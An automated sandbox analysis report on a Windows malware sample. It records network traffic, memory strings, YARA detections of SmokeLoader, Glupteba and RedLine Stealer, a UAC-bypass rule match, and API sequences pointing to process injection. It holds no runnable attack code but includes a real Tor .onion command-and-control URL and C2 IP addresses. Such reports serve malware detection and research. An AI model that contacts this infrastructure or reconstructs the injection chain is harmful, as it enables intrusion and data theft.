                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:10:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:11:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:11:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:11:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:11:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:11:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: explorer.exe, 00000002.00000000.1412996339.00000000073E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1415007841.00000000089EA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000002.00000000.1412996339.00000000073E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1415007841.00000000089EA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000002.00000000.1412996339.00000000073E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1415007841.00000000089EA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 00000002.00000000.1412144633.0000000004627000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe
                      Source: explorer.exe, 00000002.00000000.1412996339.00000000073E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1415007841.00000000089EA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008BB8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: explorer.exe, 00000002.00000000.1413491619.0000000007920000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1414735175.00000000084D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1416052037.00000000091E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008D2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: 78A4.tmpString found in binary or memory: http://www.innosetup.com/
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
                      Source: 78A4.tmpString found in binary or memory: http://www.remobjects.com/ps
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppybbwe
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSed0JA/:
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSu3
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008B3F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008B3F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/%
                      Source: explorer.exe, 00000002.00000000.1411753335.00000000031BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000002.00000000.1415007841.00000000089A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comj
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BEEE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: 5A89.exe, 00000008.00000003.2943136260.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3061866756.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000002.3842626480.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2930706935.00000000037F9000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3065013325.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2926190165.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2926481054.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BE77000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/ilable1
                      Source: explorer.exe, 00000002.00000000.1417868497.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownHTTPS traffic detected: 172.67.217.100:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.80.171:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.16.152:443 -> 192.168.2.3:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.58.31:443 -> 192.168.2.3:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.3:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.83.220:443 -> 192.168.2.3:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 199.58.81.140:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.3:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 103.20.213.70:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.42.116.17:443 -> 192.168.2.3:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 86.59.21.38:443 -> 192.168.2.3:49864 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 37.2.AD52.exe.1f0e67.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.AD52.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.AD52.exe.2d30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1913902392.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1658865401.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1432875681.0000000000511000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1659020384.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.1854293498.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Glupteba
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.2d80e67.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.288c47bbc1871b439df19ff4df68f076.exe.3670000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.1932113759.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.1834912962.0000000003AB2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.1943821340.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 17.2.6374.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.6374.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 27.0.914D.exe.5e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                      Source: 00000025.00000002.1910346635.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000000.00000002.1432794644.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000026.00000002.1929625972.0000000002BFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000007.00000002.1644186727.0000000002625000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000025.00000002.1913902392.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000026.00000002.1931017304.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000006.00000002.1658865401.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000001D.00000002.1943821340.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000025.00000002.1914262118.0000000002F3A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1433007725.000000000054F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1432875681.0000000000511000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000001F.00000002.1833599796.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1432458684.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000006.00000002.1658547253.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000006.00000002.1659020384.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000001D.00000002.1937113796.0000000002985000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000006.00000002.1659298227.00000000007AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\914D.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401561
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156F
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401729
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00403335 RtlInitUnicodeString,NtMapViewOfSection,NtQuerySystemInformation,NtQueryInformationProcess,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,wcsstr,towlower,0_2_00403335
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_004023E5 NtQuerySystemInformation,0_2_004023E5
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401587
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_004026A0 NtEnumerateKey,0_2_004026A0
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401553
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401561
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156B
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156F
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401729
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_004023E5 NtQuerySystemInformation,6_2_004023E5
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401583
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401587
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_004026A0 NtEnumerateKey,6_2_004026A0
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_027E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,7_2_027E0110
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_0040E48D NtQuerySystemInformation,10_2_0040E48D
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_00401B2C NtQueryInformationProcess,10_2_00401B2C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BEC7A0 NtCreateThreadEx,14_2_04BEC7A0
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,17_2_00409543
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_00401B2C NtQueryInformationProcess,17_2_00401B2C
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,17_2_004023F2
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_0040E48D NtQuerySystemInformation,17_2_0040E48D
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00423B7C NtdllDefWindowProc_A,18_2_00423B7C
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00478554 NtdllDefWindowProc_A,18_2_00478554
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004125D0 NtdllDefWindowProc_A,18_2_004125D0
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,18_2_004573B4
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0042F518 NtdllDefWindowProc_A,18_2_0042F518
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 10_2_0040B453: DeviceIoControl,10_2_0040B453
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,16_2_00409448
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,17_2_004023F2
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004555B8
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_004236610_2_00423661
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_0042566F0_2_0042566F
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_004258EA0_2_004258EA
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00427CF40_2_00427CF4
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00424A8B0_2_00424A8B
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_0042453C0_2_0042453C
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00424FDC0_2_00424FDC
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00425BE90_2_00425BE9
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_004236616_2_00423661
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_0042566F6_2_0042566F
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_004258EA6_2_004258EA
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00427CF46_2_00427CF4
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00424A8B6_2_00424A8B
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_0042453C6_2_0042453C
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00424FDC6_2_00424FDC
                      Source: C:\Users\user\AppData\Roaming\egiibgtCode function: 6_2_00425BE96_2_00425BE9
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_0040FC557_2_0040FC55
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_004074BE7_2_004074BE
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005D011C7_2_005D011C
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005CE10E7_2_005CE10E
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005CF5387_2_005CF538
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005D0E3E7_2_005D0E3E
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005D06967_2_005D0696
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005CFA897_2_005CFA89
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_0040F7C07_2_0040F7C0
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_004103C57_2_004103C5
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_0040FFF37_2_0040FFF3
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005CEFE97_2_005CEFE9
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005D03977_2_005D0397
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_004107AD7_2_004107AD
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: 7_2_005D27A17_2_005D27A1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04AB4F5414_2_04AB4F54
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04AB20A414_2_04AB20A4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04AB2D7814_2_04AB2D78
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04AB313C14_2_04AB313C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04AB4B0C14_2_04AB4B0C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04AB2C5814_2_04AB2C58
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04AB1ED414_2_04AB1ED4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BEC7A014_2_04BEC7A0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BEB88214_2_04BEB882
